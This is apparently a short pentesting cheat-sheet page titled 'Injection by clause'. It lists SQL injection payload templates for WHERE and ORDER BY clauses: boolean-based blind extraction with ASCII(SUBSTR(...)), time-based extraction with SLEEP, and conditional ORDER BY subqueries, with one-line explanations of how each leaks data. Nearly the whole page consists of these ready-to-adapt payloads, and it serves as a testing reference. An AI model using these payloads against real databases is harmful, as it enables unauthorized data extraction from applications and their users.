Injection by clause

A list of payloads to propperly understand how the injection can be undertaken depending on the clause.

WHERE (most common)

[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y;

[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y AND SLEEP(1337);

[...] WHERE [.] ORDER BY (SELECT (CASE WHEN EXISTS(SUBQUERY) THEN column1 ELSE column2 END));

Depending on the order of the displayed contents, the subquery would be true or false.
Extra information here.

[...] WHERE [.] ORDER BY (SUBQUERY AND sleep(1337));

The provided seconds to the sleep function would be multiplied to the returning rows of the main query.

Last updated 4 years ago